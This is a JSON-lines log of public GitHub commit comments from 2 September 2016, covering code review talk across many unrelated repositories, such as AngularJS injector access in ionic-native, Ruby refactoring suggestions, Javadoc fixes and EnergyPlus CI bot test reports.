{"id":"4509486581","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883061,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:32:49Z","updated_at":"2016-09-02T16:32:49Z","body":"Weird how it only works after a timeout :/ Better to use `document.querySelector('[ng-app]')` than document.body in case the `ng-app` isn't on the body tag, other than that I think it does the trick! I'll update my PR with it now 😄 \r\n\r\n```\r\nangular.module('myApp', [])\r\n  .config(function($compileProvider) {\r\n    //Disable runtime debug information in the compiler\r\n    $compileProvider.debugInfoEnabled(false);\r\n  })\r\n  .run(function($q, $timeout) {\r\n    $timeout(() => {\r\n      console.log($q === angular.element(document.querySelector('[ng-app]')).injector().get('$q'));\r\n    });\r\n});\r\n```"}},"created_at":"2016-09-02T16:32:49Z"}
{"id":"4509486976","type":"CommitCommentEvent","actor":{"login":"rqc"},"repo":{"name":"eedevops/he-auth-service"},"payload":{"comment":{"id":18883062,"position":12,"line":26,"path":"server.es6","commit_id":"34ba6e14301cf0f71e9dc41d2ca9a8aab47a3cc0","created_at":"2016-09-02T16:32:55Z","updated_at":"2016-09-02T16:32:55Z","body":"Sorry that I wasn't clear. This is what I meant.\r\n\r\n```javascript\r\nlet privateKey,\r\n        certificate,\r\n        passphrase;\r\n```\r\n\r\nBut honestly, if you want to have all those `let` I think it should be fine. I am kind of liking the legibility of having it redundant. WDYT?"}},"created_at":"2016-09-02T16:32:55Z"}
{"id":"4509490068","type":"CommitCommentEvent","actor":{"login":"rqc"},"repo":{"name":"eedevops/he-auth-service"},"payload":{"comment":{"id":18883068,"position":19,"line":33,"path":"server.es6","commit_id":"34ba6e14301cf0f71e9dc41d2ca9a8aab47a3cc0","created_at":"2016-09-02T16:33:36Z","updated_at":"2016-09-02T16:33:36Z","body":"Should we also forward it to `logger`?"}},"created_at":"2016-09-02T16:33:36Z"}
{"id":"4509492149","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883071,"position":219,"line":345,"path":"emulator/lib/src/memory/rom_header_new.dart","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:33:54Z","updated_at":"2016-09-02T16:33:54Z","body":"output a clean (and small) error"}},"created_at":"2016-09-02T16:33:54Z"}
{"id":"4509494170","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883077,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:34:18Z","updated_at":"2016-09-02T16:34:18Z","body":"What about injecting `$rootElement` and using it like this:\r\n\r\n`$rootElement.injector().get('$q')`\r\n\r\nThat should work and is cleaner. Thoughts?"}},"created_at":"2016-09-02T16:34:18Z"}
{"id":"4509495439","type":"CommitCommentEvent","actor":{"login":"torte478"},"repo":{"name":"torte478/GuitarTrainer"},"payload":{"comment":{"id":18883078,"position":null,"line":null,"path":null,"commit_id":"4a3fdc12ae5ea7966a8e6d9b464849181759557d","created_at":"2016-09-02T16:34:34Z","updated_at":"2016-09-02T16:34:34Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;SwtcYvB4&#x2F;34-setting-s-page\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Setting&#39;s page</a>"}},"created_at":"2016-09-02T16:34:34Z"}
{"id":"4509498208","type":"CommitCommentEvent","actor":{"login":"HertBox"},"repo":{"name":"HertBox/Pixhawk-Arduino-Mavlink"},"payload":{"comment":{"id":18883085,"position":null,"line":null,"path":null,"commit_id":"fc066dec0c660419f15205be58641318b2575064","created_at":"2016-09-02T16:35:12Z","updated_at":"2016-09-02T16:35:12Z","body":"hey man, thanks about that, of course i can help you, if you prefer, send me a mail and we can have a Skype chat and i we can try to make it work in the Arduino Uno. my mail is lavaltierra@gmail.com"}},"created_at":"2016-09-02T16:35:12Z"}
{"id":"4509499344","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18883091,"position":5,"line":40,"path":"public/assets/lang/lang-en_US.json","commit_id":"84ff7905d3e8d6b273119c24be74ec9c5704d156","created_at":"2016-09-02T16:35:25Z","updated_at":"2016-09-02T16:35:25Z","body":"Fixed in 0b4fd7c"}},"created_at":"2016-09-02T16:35:25Z"}
{"id":"4509500198","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":18883093,"position":74,"line":121,"path":"public/assets/lang/lang-en_US.json","commit_id":"84ff7905d3e8d6b273119c24be74ec9c5704d156","created_at":"2016-09-02T16:35:36Z","updated_at":"2016-09-02T16:35:36Z","body":"Fixed in 06347df"}},"created_at":"2016-09-02T16:35:36Z"}
{"id":"4509501171","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18883094,"position":15,"line":0,"path":"app/src/main/java/com/ruesga/rview/fragments/ChangeDetailsFragment.java","commit_id":"5870605d5f478a4a845995d900561bf461887f50","created_at":"2016-09-02T16:35:48Z","updated_at":"2016-09-02T16:35:48Z","body":"Visibilitiy of the root view is done upper in the stack, but this need some visibility check while things are loading. I handled it in #bafcc8e4c5fcbc5c0881867a6996ce0dbb48712f"}},"created_at":"2016-09-02T16:35:48Z"}
{"id":"4509501245","type":"CommitCommentEvent","actor":{"login":"zauberparacelsus"},"repo":{"name":"auntieNeo/libmc"},"payload":{"comment":{"id":18883096,"position":null,"line":null,"path":null,"commit_id":"ee18d5b9f2c9912090a9f3b2a4c5b1f8dc48cf13","created_at":"2016-09-02T16:35:49Z","updated_at":"2016-09-02T16:35:49Z","body":"When you say \"Marching Squares\", are you referring to the Cubical Marching Squares algorithm?"}},"created_at":"2016-09-02T16:35:49Z"}
{"id":"4509502512","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883098,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:36:07Z","updated_at":"2016-09-02T16:36:07Z","body":"How would you get the `$rootElement` from outside of angular though?"}},"created_at":"2016-09-02T16:36:07Z"}
{"id":"4509502875","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18883099,"position":8,"line":8,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-02T16:36:12Z","updated_at":"2016-09-02T16:36:12Z","body":"That's a good point.  I did a little digging and PS has some cmdlets that will handle diff'ing, and for our non-Windows variants we can use the diff tool."}},"created_at":"2016-09-02T16:36:12Z"}
{"id":"4509504033","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":18883100,"position":null,"line":null,"path":null,"commit_id":"22ce0b76b08151fd2adf0589199e4b88cdcd76f5","created_at":"2016-09-02T16:36:26Z","updated_at":"2016-09-02T16:36:26Z","body":"Wrapping `fs` methods fixes a bug due to modifying global state. In the main exports, we append a read-only method to the `async` interfaces. Originally, these interfaces were aliases for builtin Node.js methods, and thus, the appended methods had the side effect of modifying global state.\r\n\r\nThis can lead to bugs and have side effects for third party users. For example, because the  appended methods were read-only, if two modules (e.g., `@stdlib/fs/read-file` and `build/coverage/node_modules/@stdlib/fs/read-file` as happens when running test coverage) both attempt to modify `fs` methods directly. Because `fs` is \"global\", an error is encountered due to attempting to set a read-only property as a `sync` property is already set.\r\n\r\nLesson learned: avoid modifying builtin Node.js modules to avoid modifying global state.\r\n\r\n "}},"created_at":"2016-09-02T16:36:26Z"}
{"id":"4509504757","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18883101,"position":16,"line":884,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/api/Document.java","commit_id":"bf0642750972d074c54d1fa9b89917b422524aae","created_at":"2016-09-02T16:36:36Z","updated_at":"2016-09-02T16:36:36Z","body":"missing a `@` symbol, `{@code ...}`."}},"created_at":"2016-09-02T16:36:36Z"}
{"id":"4509505392","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18883102,"position":25,"line":921,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/api/Document.java","commit_id":"bf0642750972d074c54d1fa9b89917b422524aae","created_at":"2016-09-02T16:36:43Z","updated_at":"2016-09-02T16:36:43Z","body":"same"}},"created_at":"2016-09-02T16:36:43Z"}
{"id":"4509508440","type":"CommitCommentEvent","actor":{"login":"mlynch"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883111,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:37:25Z","updated_at":"2016-09-02T16:37:25Z","body":"oh, good call :D\r\n\r\nSo, the issue with `[ng-app]` is that it won't work if the user bootstrapped manually. I *believe* (and my tests have shown this), that using `document.body` will work even if they bootstrapped with the `<html>` node"}},"created_at":"2016-09-02T16:37:25Z"}
{"id":"4509508917","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18883112,"position":72,"line":1592,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/api/Document.java","commit_id":"bf0642750972d074c54d1fa9b89917b422524aae","created_at":"2016-09-02T16:37:31Z","updated_at":"2016-09-02T16:37:31Z","body":"FTR I prefer \"object\" to \"obj\" (I know you changed only the javadoc and not the code :))."}},"created_at":"2016-09-02T16:37:31Z"}
{"id":"4509511255","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18883118,"position":7,"line":687,"path":"xwiki-platform-core/xwiki-platform-oldcore/src/main/java/com/xpn/xwiki/api/XWiki.java","commit_id":"bf0642750972d074c54d1fa9b89917b422524aae","created_at":"2016-09-02T16:38:01Z","updated_at":"2016-09-02T16:38:01Z","body":"missing `@`"}},"created_at":"2016-09-02T16:38:01Z"}
{"id":"4509512650","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18883121,"position":null,"line":null,"path":null,"commit_id":"da9e03c15b81d62bd6faf086350651976f94976b","created_at":"2016-09-02T16:38:18Z","updated_at":"2016-09-02T16:38:18Z","body":"No"}},"created_at":"2016-09-02T16:38:18Z"}
{"id":"4509512890","type":"CommitCommentEvent","actor":{"login":"chucklesf"},"repo":{"name":"chucklesf/hello-world"},"payload":{"comment":{"id":18883122,"position":null,"line":null,"path":null,"commit_id":"3c4174bff00a3f2407555407ba88325c5f2b801a","created_at":"2016-09-02T16:38:22Z","updated_at":"2016-09-02T16:38:22Z","body":"My first change"}},"created_at":"2016-09-02T16:38:22Z"}
{"id":"4509515540","type":"CommitCommentEvent","actor":{"login":"saturnflyer"},"repo":{"name":"kalleth/short-url-manager"},"payload":{"comment":{"id":18883126,"position":31,"line":38,"path":"app/controllers/short_url_requests_controller.rb","commit_id":"be3b457171e595e355eadede868bf07cfa379e5e","created_at":"2016-09-02T16:38:56Z","updated_at":"2016-09-02T16:38:56Z","body":"I like to opt for instances instead of classes.\r\n\r\nYou could use methods too. Not sure if it would matter much but it would avoid argument handling if you do something like\r\n```ruby\r\nrequestor.success {\r\n  # success stuff\r\n}.failure {\r\n  #failure stuff\r\n}.confirmation_required {\r\n  # confirm stuff\r\n}.create\r\n```\r\nWhere each function adds the value for the block to be called at the appropriate time rather than having to do the `key: ->(lambdastuff){ ... }`\r\nI don't think that matters materially.\r\n"}},"created_at":"2016-09-02T16:38:56Z"}
{"id":"4509515824","type":"CommitCommentEvent","actor":{"login":"primaeval"},"repo":{"name":"vonH/plugin.video.iplayerwww"},"payload":{"comment":{"id":18883127,"position":null,"line":null,"path":null,"commit_id":"8f9ce19c413677bc093e38419f2642c0478661f9","created_at":"2016-09-02T16:39:00Z","updated_at":"2016-09-02T16:39:00Z","body":"http://www.gcse.com/english/licence.htm\r\n\r\nThanks for the release by the way."}},"created_at":"2016-09-02T16:39:00Z"}
{"id":"4509519132","type":"CommitCommentEvent","actor":{"login":"compumatrix"},"repo":{"name":"bitshares/bitshares-2"},"payload":{"comment":{"id":18883135,"position":null,"line":null,"path":null,"commit_id":"dfb9043df54a9f51983ed04014cd9ddc2a216323","created_at":"2016-09-02T16:39:45Z","updated_at":"2016-09-02T16:39:45Z","body":"That would be great if the GUI would have draw style options to choose from between line, mountain, candle or OHLC. I do prefer candles."}},"created_at":"2016-09-02T16:39:45Z"}
{"id":"4509520428","type":"CommitCommentEvent","actor":{"login":"pferreir"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18883137,"position":51,"line":51,"path":"indico/modules/events/abstracts/controllers/email_templates.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-02T16:40:03Z","updated_at":"2016-09-02T16:40:03Z","body":"Ah OK, you're right. It's just that before this RH was adding and editing. We still have to do it by hand [here](https://github.com/indico/indico/commit/2e8334e2672407da50bbaa3536c1db7f157e66a5#diff-3a4cb36fae67ae452ba2e8b78e5b56c2R82) though."}},"created_at":"2016-09-02T16:40:03Z"}
{"id":"4509521086","type":"CommitCommentEvent","actor":{"login":"samegel"},"repo":{"name":"samegel/sample_project"},"payload":{"comment":{"id":18883140,"position":3,"line":2,"path":"sample_project.flprj","commit_id":"9bd8503b958f832c1946f36ff64027a71a4647b6","created_at":"2016-09-02T16:40:11Z","updated_at":"2016-09-02T16:40:11Z","body":"@thad-miller @JGoettemoeller I ran into a merge conflict on this file when I tried to pull these changes.\r\n\r\nAs you can see, the project path is different btw/Jeff's version and mine. I don't want to run into this problem all the time, so I've added `*.flprj` to the `.gitignore` file for this project. I'll see if that prevents the merge conflict. We may all need to ignore this file to prevent the conflict. Will let you know what I find out."}},"created_at":"2016-09-02T16:40:11Z"}
{"id":"4509521119","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883141,"position":7,"line":15,"path":"README.md","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:40:11Z","updated_at":"2016-09-02T16:40:11Z","body":"` in high speed, run one inst take as long as run one sec` sure"}},"created_at":"2016-09-02T16:40:11Z"}
{"id":"4509522255","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883145,"position":null,"line":null,"path":null,"commit_id":"f6395ecd09e8f982df4f039b61393cc60dc6e56c","created_at":"2016-09-02T16:40:25Z","updated_at":"2016-09-02T16:40:25Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-MacOS-10.9-clang: OK (2326 of 2327 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T16:40:25Z"}
{"id":"4509523533","type":"CommitCommentEvent","actor":{"login":"mattlewis92"},"repo":{"name":"driftyco/ionic-native"},"payload":{"comment":{"id":18883154,"position":null,"line":null,"path":null,"commit_id":"2dc68a4785b7d9218a0d5bb936efd35cbb554e1b","created_at":"2016-09-02T16:40:40Z","updated_at":"2016-09-02T16:40:40Z","body":"document.body will work if ng-app is on the html or body tag, if it's somewhere inside the body tag it doesn't though. Same goes for if they bootstrap the app on an element that isn't the body or html tag :/"}},"created_at":"2016-09-02T16:40:40Z"}
{"id":"4509525346","type":"CommitCommentEvent","actor":{"login":"saturnflyer"},"repo":{"name":"kalleth/short-url-manager"},"payload":{"comment":{"id":18883162,"position":79,"line":72,"path":"app/controllers/short_url_requests_controller.rb","commit_id":"be3b457171e595e355eadede868bf07cfa379e5e","created_at":"2016-09-02T16:41:03Z","updated_at":"2016-09-02T16:41:03Z","body":"if you move to an instance, you can remove _some_ of the duplicated ideas by doing something like\r\n```ruby\r\ndef requestor\r\n  @requestor ||= ShortUrlRequestsService.new(@short_url_request)\r\nend\r\n```\r\nAnd then just do `requestor.update(whatever)`"}},"created_at":"2016-09-02T16:41:03Z"}
{"id":"4509527219","type":"CommitCommentEvent","actor":{"login":"bborgesr"},"repo":{"name":"rstudio/shiny"},"payload":{"comment":{"id":18883167,"position":null,"line":null,"path":null,"commit_id":"1ff52c529076c5bf6d2dcfa1a232eace8bfbbaee","created_at":"2016-09-02T16:41:27Z","updated_at":"2016-09-02T16:41:27Z","body":"Ah, yes, I'll definitely be more careful in the future. I only realized I was pushing both commits after I pushed it :( I was using the IDE GH integration which, *I think*, doesn't make explicit it is adding a new commit when you do click \"Pull\" and you're out of date... This has happened to me a few times, but I get it's a pretty terrible practice and just clutters up our repo... Sorry! And thanks for the heads-up"}},"created_at":"2016-09-02T16:41:27Z"}
{"id":"4509530919","type":"CommitCommentEvent","actor":{"login":"D-ECHO"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18883176,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-02T16:42:17Z","updated_at":"2016-09-02T16:42:17Z","body":"Are you sure the flightdeck now fits the cokpit?\r\nI still get this [img]http://i.imgur.com/OF2N1s1.jpg[/img]"}},"created_at":"2016-09-02T16:42:17Z"}
{"id":"4509533973","type":"CommitCommentEvent","actor":{"login":"RyanThompson"},"repo":{"name":"anomalylabs/streams-platform"},"payload":{"comment":{"id":18883182,"position":null,"line":null,"path":null,"commit_id":"5cff1db919f2e1364f8926e8ce9f1e5d54b6f8d9","created_at":"2016-09-02T16:42:58Z","updated_at":"2016-09-02T16:42:58Z","body":"If the value is an array filter it and send back null if it's empty."}},"created_at":"2016-09-02T16:42:58Z"}
{"id":"4509535802","type":"CommitCommentEvent","actor":{"login":"nrileykc"},"repo":{"name":"yanivkalfa/nathan"},"payload":{"comment":{"id":18883185,"position":null,"line":null,"path":null,"commit_id":"c99d58e4897a65526fe0b9884c47f84bd311df04","created_at":"2016-09-02T16:43:24Z","updated_at":"2016-09-02T16:43:24Z","body":"Ah still working on this huh?  I got it all working a few weeks back by the way.  Thanks for the help working well now."}},"created_at":"2016-09-02T16:43:24Z"}
{"id":"4509536578","type":"CommitCommentEvent","actor":{"login":"meltsufin"},"repo":{"name":"GoogleCloudPlatform/app-maven-plugin"},"payload":{"comment":{"id":18883192,"position":null,"line":null,"path":null,"commit_id":"fb9d6c26e1e19b3f07060196094887a77ce7438e","created_at":"2016-09-02T16:43:35Z","updated_at":"2016-09-02T16:43:35Z","body":"Dropping the \"-beta\" suffix from the release version. Version starting with 0.x.x and indication of beta in docs should be sufficient.\r\n@loosebazooka @patflynn PTAL"}},"created_at":"2016-09-02T16:43:35Z"}
{"id":"4509538619","type":"CommitCommentEvent","actor":{"login":"mrkulik"},"repo":{"name":"mrkulik/2big2take"},"payload":{"comment":{"id":18883199,"position":1,"line":1,"path":"README.md","commit_id":"ebf12ba24043f52ba9b2b0787c5ae9b427989e7a","created_at":"2016-09-02T16:44:02Z","updated_at":"2016-09-02T16:44:02Z","body":"+#Myts go hard"}},"created_at":"2016-09-02T16:44:02Z"}
{"id":"4509539028","type":"CommitCommentEvent","actor":{"login":"dw-nr-pechanga"},"repo":{"name":"esgyn/code-examples"},"payload":{"comment":{"id":18883201,"position":null,"line":null,"path":null,"commit_id":"26977493397a177f37ee647d5a25e7e9d1100492","created_at":"2016-09-02T16:44:09Z","updated_at":"2016-09-02T16:44:09Z","body":"A basic TMUDF interfacing to Lucene (v5.5.2); uses RAMDirectory; indexes and searches (queries) one row at-a-time - not a search across all rows in the table."}},"created_at":"2016-09-02T16:44:09Z"}
{"id":"4509541046","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18883207,"position":null,"line":null,"path":null,"commit_id":"f6395ecd09e8f982df4f039b61393cc60dc6e56c","created_at":"2016-09-02T16:44:35Z","updated_at":"2016-09-02T16:44:35Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f6395ecd09e8f982df4f039b61393cc60dc6e56c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T16:44:35Z"}
{"id":"4509542458","type":"CommitCommentEvent","actor":{"login":"toadsTF"},"repo":{"name":"baldengineers/mapper"},"payload":{"comment":{"id":18883212,"position":null,"line":null,"path":null,"commit_id":"605adb3aff9d54905c541db88c427cb3abc3ba7b","created_at":"2016-09-02T16:44:55Z","updated_at":"2016-09-02T16:44:55Z","body":"great commit\r\n"}},"created_at":"2016-09-02T16:44:55Z"}
{"id":"4509548505","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883227,"position":7,"line":15,"path":"README.md","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:46:16Z","updated_at":"2016-09-02T16:46:16Z","body":"`Running one inst feels like running two (colors in debugger)` comes from `emulator/lib/src/worker_debug.dart#L30`"}},"created_at":"2016-09-02T16:46:16Z"}
{"id":"4509550024","type":"CommitCommentEvent","actor":{"login":"cbaaa"},"repo":{"name":"minfolio/minfolio.github.io"},"payload":{"comment":{"id":18883235,"position":null,"line":null,"path":null,"commit_id":"fa4a0da87dc92c3c653e289cc0bf0e16a1ac5ae8","created_at":"2016-09-02T16:46:33Z","updated_at":"2016-09-02T16:46:33Z","body":"Changed naked domain to WWW"}},"created_at":"2016-09-02T16:46:33Z"}
{"id":"4509552935","type":"CommitCommentEvent","actor":{"login":"enyert"},"repo":{"name":"Admios/watson-alchemy-language-connector"},"payload":{"comment":{"id":18883240,"position":null,"line":null,"path":null,"commit_id":"3cf4a6278a507276e0ace93b3eedcc792052aeeb","created_at":"2016-09-02T16:47:12Z","updated_at":"2016-09-02T16:47:12Z","body":"LGFM"}},"created_at":"2016-09-02T16:47:12Z"}
{"id":"4509559246","type":"CommitCommentEvent","actor":{"login":"Ngoguey42"},"repo":{"name":"jsaglio42/GBmu"},"payload":{"comment":{"id":18883258,"position":6,"line":14,"path":"README.md","commit_id":"6d2efe272dbb914f0f7f141bde73ac1151ec2cf7","created_at":"2016-09-02T16:48:35Z","updated_at":"2016-09-02T16:48:35Z","body":"`alerts panel` does this"}},"created_at":"2016-09-02T16:48:35Z"}
{"id":"4509560668","type":"CommitCommentEvent","actor":{"login":"jsbrit01"},"repo":{"name":"jsbrit01-org/magnum-opus"},"payload":{"comment":{"id":18883261,"position":4,"line":4,"path":"README.md","commit_id":"2500ac9237fe52955272a74cb5048654bf923be1","created_at":"2016-09-02T16:48:53Z","updated_at":"2016-09-02T16:48:53Z","body":"I don't like this line. I think we need to write it using a for loop rather than a while"}},"created_at":"2016-09-02T16:48:53Z"}
{"id":"4509561882","type":"CommitCommentEvent","actor":{"login":"jsbrit01"},"repo":{"name":"jsbrit01-org/magnum-opus"},"payload":{"comment":{"id":18883266,"position":4,"line":4,"path":"README.md","commit_id":"2500ac9237fe52955272a74cb5048654bf923be1","created_at":"2016-09-02T16:49:10Z","updated_at":"2016-09-02T16:49:10Z","body":"Which line?"}},"created_at":"2016-09-02T16:49:10Z"}
{"id":"4509562755","type":"CommitCommentEvent","actor":{"login":"jvictorchen"},"repo":{"name":"jvictorchen/libphonenumber"},"payload":{"comment":{"id":18883270,"position":null,"line":null,"path":null,"commit_id":"fd3e35d1ea4fcdff948982c04d2b4bc5142305c6","created_at":"2016-09-02T16:49:19Z","updated_at":"2016-09-02T16:49:19Z","body":"This fix is not correct. Writing a new one"}},"created_at":"2016-09-02T16:49:19Z"}
{"id":"4509563459","type":"CommitCommentEvent","actor":{"login":"jsbrit01"},"repo":{"name":"jsbrit01-org/magnum-opus"},"payload":{"comment":{"id":18883272,"position":1,"line":1,"path":"README.md","commit_id":"2500ac9237fe52955272a74cb5048654bf923be1","created_at":"2016-09-02T16:49:28Z","updated_at":"2016-09-02T16:49:28Z","body":"don't like line 2"}},"created_at":"2016-09-02T16:49:28Z"}
{"id":"4509565031","type":"CommitCommentEvent","actor":{"login":"demianhh"},"repo":{"name":"demianhh/sergiomo71"},"payload":{"comment":{"id":18883276,"position":1,"line":1,"path":"README.md","commit_id":"2c0abf949548230ea554cc42277ed8d44dcb7e35","created_at":"2016-09-02T16:49:49Z","updated_at":"2016-09-02T16:49:49Z","body":"+{new game -150("}},"created_at":"2016-09-02T16:49:49Z"}
{"id":"4509565037","type":"CommitCommentEvent","actor":{"login":"jsbrit01"},"repo":{"name":"jsbrit01-org/magnum-opus"},"payload":{"comment":{"id":18883277,"position":2,"line":2,"path":"README.md","commit_id":"2500ac9237fe52955272a74cb5048654bf923be1","created_at":"2016-09-02T16:49:49Z","updated_at":"2016-09-02T16:49:49Z","body":"hate this line too..."}},"created_at":"2016-09-02T16:49:49Z"}
{"id":"4509567533","type":"CommitCommentEvent","actor":{"login":"ThiefMaster"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18883285,"position":51,"line":51,"path":"indico/modules/events/abstracts/controllers/email_templates.py","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-02T16:50:22Z","updated_at":"2016-09-02T16:50:22Z","body":"I don't think so - it's also a `__setattr__`-like assignment which should be fine. if not, there's `flag_modified` (or whatever it's called)"}},"created_at":"2016-09-02T16:50:22Z"}
{"id":"4509568727","type":"CommitCommentEvent","actor":{"login":"roman-drebotiy"},"repo":{"name":"AndriyIvaskevych/tick"},"payload":{"comment":{"id":18883286,"position":null,"line":null,"path":null,"commit_id":"698d8f55b920742501816aeeda35446fcc4b5ea8","created_at":"2016-09-02T16:50:36Z","updated_at":"2016-09-02T16:50:36Z","body":":+1: "}},"created_at":"2016-09-02T16:50:36Z"}
{"id":"4509569358","type":"CommitCommentEvent","actor":{"login":"pferreir"},"repo":{"name":"indico/indico"},"payload":{"comment":{"id":18883290,"position":13,"line":13,"path":"indico/modules/events/abstracts/templates/emails/abstract_accept_notification.txt","commit_id":"2e8334e2672407da50bbaa3536c1db7f157e66a5","created_at":"2016-09-02T16:50:44Z","updated_at":"2016-09-02T16:50:44Z","body":"If we had something like an \"event language\", then yes. In this case I agree it doesn't."}},"created_at":"2016-09-02T16:50:44Z"}
{"id":"4509569443","type":"CommitCommentEvent","actor":{"login":"rhwood"},"repo":{"name":"JMRI/JMRI"},"payload":{"comment":{"id":18883291,"position":16,"line":51,"path":"java/src/jmri/NamedBeanHandleManager.java","commit_id":"6b19b45d65f8663b2ac010d839f1ae9c45344d7f","created_at":"2016-09-02T16:50:46Z","updated_at":"2016-09-02T16:50:46Z","body":"Is it possible that the problem is that ```public <T> @CheckForNull ...``` should instead be either ```@CheckForNull public <T> ...``` or ```public @CheckForNull <T> ...``` (i.e. that putting the CheckForNull in the middle of the Generics is causing issues)?"}},"created_at":"2016-09-02T16:50:46Z"}
{"id":"4509569718","type":"CommitCommentEvent","actor":{"login":"jsbrit01"},"repo":{"name":"jsbrit01-org/magnum-opus"},"payload":{"comment":{"id":18883292,"position":3,"line":3,"path":"README.md","commit_id":"2500ac9237fe52955272a74cb5048654bf923be1","created_at":"2016-09-02T16:50:49Z","updated_at":"2016-09-02T16:50:49Z","body":"don't like this line... No more \"+\"!!!!!!!!!!!!\r\nOnly \"-\"!!!!!!!!!!!! :angry: :angry: :angry: !!!!!"}},"created_at":"2016-09-02T16:50:49Z"}
{"id":"4509570832","type":"CommitCommentEvent","actor":{"login":"JoseGalRe"},"repo":{"name":"Arc-Team/android_kernel_lge_d851"},"payload":{"comment":{"id":18883293,"position":null,"line":null,"path":null,"commit_id":"a87a3702db31abd913945204c31eef16ffb992fa","created_at":"2016-09-02T16:51:03Z","updated_at":"2016-09-02T16:51:03Z","body":"the camera works on 7.0, atm only autoiso no works"}},"created_at":"2016-09-02T16:51:03Z"}
